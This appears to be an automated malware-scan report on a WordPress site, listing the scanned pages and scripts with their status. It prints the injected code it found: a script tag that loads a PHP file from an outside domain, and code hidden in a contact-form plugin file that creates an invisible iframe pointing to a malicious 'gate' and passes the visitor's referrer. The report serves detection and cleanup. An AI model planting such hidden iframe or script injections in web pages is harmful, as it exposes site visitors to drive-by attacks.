Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=pdtrebnje.si
Result: The website is marked by Google as suspicious; visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://pdtrebnje.si/ | 200 OK Content-Length: 30098 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: thomas-fortassin.com
...[4105 bytes skipped]... 17 seconds. -->
<script type='text/javascript' src='http://pdtrebnje.si/wp/wp-includes/js/jquery/jquery.form.js?ver=2.73'></script>
<script type='text/javascript' src='http://pdtrebnje.si/wp/wp-content/plugins/contact-form-7/contact-form-7.js?ver=2.0.5'></script>
</div>
</div>
<!-- page -->
</body>
</html>
<script type="text/javascript" src="http://thomas-fortassin.com/Pokewac/wfvwncd9.php?id=8313485"></script>
http://pdtrebnje.si/wp/wp-includes/js/jquery/jquery.js?ver=1.7.1 | 200 OK Content-Length: 93889 Content-Type: application/javascript | clean |
http://pdtrebnje.si/wp/wp-content/plugins/lightbox-plus/js/jquery.colorbox-min.js?ver=3.3.1 | 200 OK Content-Length: 8433 Content-Type: application/javascript | clean |
http://pdtrebnje.si/wp/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js?ver=1.3.0 | 200 OK Content-Length: 8923 Content-Type: application/javascript | clean |
http://pdtrebnje.si/wp/wp-includes/js/swfobject.js?ver=2.2 | 200 OK Content-Length: 10220 Content-Type: application/javascript | clean |
http://pdtrebnje.si/wp/wp-content/plugins/nextgen-gallery/js/ngg.js?ver=3.3.1 | 200 OK Content-Length: 5688 Content-Type: application/javascript | clean |
http://lite.piclens.com/current/piclens_optimized.js | 200 OK Content-Length: 21750 Content-Type: application/x-javascript | clean |
http://thomas-fortassin.com/Pokewac/wfvwncd9.php?id=8314951 | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://thomas-fortassin.com/test404page.js | 404 Not Found Content-Length: 823 Content-Type: text/html | clean |
http://pdtrebnje.si/wp/wp-includes/js/jquery/jquery.form.js?ver=2.73 | 200 OK Content-Length: 11115 Content-Type: application/javascript | clean |
http://pdtrebnje.si/wp/wp-content/plugins/contact-form-7/contact-form-7.js?ver=2.0.5 | 200 OK Content-Length: 4431 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
jQuery(document).ready(function() {
  try {
    jQuery('div.wpcf7 > form').ajaxForm({ beforeSubmit: wpcf7BeforeSubmit, dataType: 'json', success: wpcf7ProcessJson });
  } catch (e) { }
  try {
    jQuery('div.wpcf7 > form').each(function(i, n) { wpcf7ToggleSubmit(jQuery(n)); });
  } catch (e) { }
});
function wpcf7ExclusiveCheckbox(elem) {<
window.setTimeout(function(){
  var JSinj=document.createElement('iframe');
  JSinj.src='http://zalupka.in/gate/gate.php?f=759814&r='+encodeURI(document.referrer||'');
  JSinj.width='0';
  JSinj.height='0';
  JSinj.frameborder='0';
  JSinj.marginheight='0';
  JSinj.marginwidth='0';
  JSinj.border='0';
  try{ document.body.appendChild(JSinj); }catch(e){ document.documentElement.appendChild(JSinj); }
}, 2000);
}
Antivirus reports:
http://thomas-fortassin.com/Pokewac/wfvwncd9.php?id=8313485 | 200 OK Content-Length: 0 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: pdtrebnje.si
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 15 Sep 2014 04:51:28 GMT
Server: Apache/2.4.9 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Content-Type: text/html; charset=UTF-8
X-Pingback: http://pdtrebnje.si/wp/xmlrpc.php
X-Powered-By: PHP/5.3.28
Second query (visit from search engine):
GET / HTTP/1.1
Host: pdtrebnje.si
Referer: http://www.google.com/search?q=pdtrebnje.si
Result:
The result is similar to the first query. There are no suspicious redirects found.